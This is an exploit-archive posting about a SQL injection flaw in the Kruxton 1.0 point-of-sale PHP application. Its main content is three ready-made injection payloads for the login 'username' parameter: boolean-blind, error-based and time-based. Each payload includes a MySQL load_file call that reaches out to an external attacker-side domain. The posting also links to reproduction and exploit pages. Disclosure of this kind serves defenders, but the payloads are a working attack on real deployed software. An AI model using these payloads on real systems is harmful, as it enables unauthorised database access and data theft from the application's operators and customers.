Kruxton 1.0 SQL Injection

Kruxton 1.0 SQL Injection: Posted Apr 15, 2024; Authored by nu11secur1ty; Kruxton version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 9848e498414e8e0e14e12064a9a285c3bc570dd55bd67b2940d83dc1a77c56cd; Download | Favorite | View

Kruxton 1.0 SQL Injection

## Title: kruxton-1.0-Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/15/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'
was submitted in the username parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.The attacker can get all information from the system by
using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=DKVEBDYC@burpcollaborator.net'+(select
load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''
OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: username=DKVEBDYC@burpcollaborator.net'+(select
load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''
AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT
(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR
'jdui'='fNTo&password=v0N!p1j!S6

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=DKVEBDYC@burpcollaborator.net'+(select
load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''
AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR
'ffIk'='SAqf&password=v0N!p1j!S6
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)

## Time spent:
01:15:00

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 93 files
Gentoo 29 files
indoushka 26 files
Debian 13 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
jheysel-r7 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Kruxton 1.0 SQL Injection

Kruxton 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Kruxton 1.0 SQL Injection

Share This

Kruxton 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems